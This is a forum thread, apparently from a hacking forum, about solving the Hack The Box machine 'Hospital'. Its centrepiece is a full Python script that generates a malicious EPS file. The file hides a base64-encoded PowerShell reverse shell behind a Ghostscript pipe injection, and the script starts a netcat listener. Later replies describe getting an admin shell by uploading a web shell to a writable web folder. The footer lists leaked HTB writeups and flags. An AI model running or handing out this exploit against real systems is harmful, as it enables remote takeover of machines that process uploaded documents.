11-19-2023, 02:45 AM
can't run winpeas any hints for admin
|
HTB - Hospital
by take1312 - Saturday November 18, 2023 at 06:51 PM
|
|
11-19-2023, 02:45 AM
can't run winpeas any hints for admin
11-19-2023, 06:23 AM
11-19-2023, 07:49 AM
11-19-2023, 07:49 AM
revised the exploit to be easier for the scrubs
![]() ![]() import argparse
import os
import re
import subprocess
import base64
def get_user_input():
ip_command = "ip addr show tun0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1"
ip = subprocess.check_output(ip_command, shell=True).decode().strip()
print(f"Detected Tun0 IP: {ip}")
user_ip = input("Enter to accept IP or type new IP: ")
ip = user_ip if user_ip else ip
port = input("Enter NetCat connect back port: ")
filename = input("Enter filename: ")
return ip, port, filename
def generate_payload(ip, port):
payload = f"""$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{{0}};
while(( $i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()}};
$client.Close()"""
base64_payload = base64.b64encode(payload.encode('utf-16le')).decode()
final_payload = f"powershell -e {base64_payload}"
escaped_payload = f"(%pipe%{final_payload}) (w) file /DCTDecode filter"
return escaped_payload
def generate_payload_file(filename, payload):
content = f"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 300 300
%%Title: Malicious EPS
/Times-Roman findfont
24 scalefont
setfont
newpath
50 200 moveto
(Sup breachforums!) show
newpath
30 100 moveto
60 230 lineto
90 100 lineto
stroke
{payload}
showpage"""
filename = filename + '.eps'
with open(filename, 'w') as file:
file.write(content)
def main():
ip, port, filename = get_user_input()
payload = generate_payload(ip, port)
generate_payload_file(filename, payload)
print(f"\n[+] Generated malicious .eps file: {filename}.eps")
print(f"[+] Popping your courtesy netcat shell: {ip} -lvnp {port}")
print(f"[+] Log into RoundCubeMail and reply to Dr Brown's email, \n attach {filename}.eps and send. Rev Shell takes a few seconds :)")
command = f'qterminal -e "bash -c \'nc -lvnp {port}; exec bash\'"'
subprocess.Popen(command, shell=True)
if __name__ == "__main__":
main()(11-19-2023, 01:32 AM)take1312 Wrote:This one worked for me(11-19-2023, 01:29 AM)Miranda0315 Wrote:(11-19-2023, 01:25 AM)Miranda0315 Wrote:I know the reason now LOL(11-19-2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do: ![]() (11-19-2023, 07:49 AM)chillywilly Wrote: revised the exploit to be easier for the scrubs Good stuff sir
11-19-2023, 10:51 AM
(11-19-2023, 09:00 AM)kayiz113987 Wrote:(11-19-2023, 08:54 AM)Miranda0315 Wrote:(11-19-2023, 08:47 AM)kayiz113987 Wrote:(11-19-2023, 08:14 AM)Miranda0315 Wrote:(11-19-2023, 08:06 AM)kayiz113987 Wrote: Can anyone help me to Administrator? Stuck with that :vHint is using RDP Same. Stuck on getting Administrator I am not very good with Windows Priv Esc
11-19-2023, 11:21 AM
(11-19-2023, 07:49 AM)m1lk Wrote:xampp/htdocs(11-19-2023, 06:23 AM)hcker01 Wrote:(11-19-2023, 04:55 AM)Miranda0315 Wrote:you can write in a special folder and you gain admin(11-19-2023, 02:45 AM)hcker01 Wrote: can't run winpeas any hints for admin
11-19-2023, 12:14 PM
(11-19-2023, 11:21 AM)hcker01 Wrote:(11-19-2023, 07:49 AM)m1lk Wrote:xampp/htdocs(11-19-2023, 06:23 AM)hcker01 Wrote:(11-19-2023, 04:55 AM)Miranda0315 Wrote:you can write in a special folder and you gain admin(11-19-2023, 02:45 AM)hcker01 Wrote: can't run winpeas any hints for admin Can you detaille for administrator please
11-19-2023, 12:42 PM
(11-19-2023, 12:14 PM)nenandjabhata Wrote:(11-19-2023, 11:21 AM)hcker01 Wrote:(11-19-2023, 07:49 AM)m1lk Wrote:xampp/htdocs(11-19-2023, 06:23 AM)hcker01 Wrote:(11-19-2023, 04:55 AM)Miranda0315 Wrote: have you found a way to administrator?you can write in a special folder and you gain admin Webserver hosts files in this folder (check the names and see if you can access them) -> yes you can (e.g. index.php via https) upload shell there acess it recieve root shell
11-19-2023, 01:56 PM
(11-19-2023, 12:42 PM)take1312 Wrote:(11-19-2023, 12:14 PM)nenandjabhata Wrote:(11-19-2023, 11:21 AM)hcker01 Wrote:(11-19-2023, 07:49 AM)m1lk Wrote:xampp/htdocs(11-19-2023, 06:23 AM)hcker01 Wrote: you can write in a special folder and you gain admin I became administrator, but what in the machine indicates that I would become admin if I put a shell in that folder? |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 360 | 90,899 |
03-28-2026, 09:28 AM Last Post: |
||
| [FREE] HTB-ProLabs APTLABS Just Flags | 23 | 4,366 |
03-28-2026, 03:30 AM Last Post: |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 87 | 9,529 |
03-27-2026, 07:22 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 2,352 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - ALL Challenges you Stuck in | 2 | 2,650 |
03-27-2026, 04:24 PM Last Post: |
||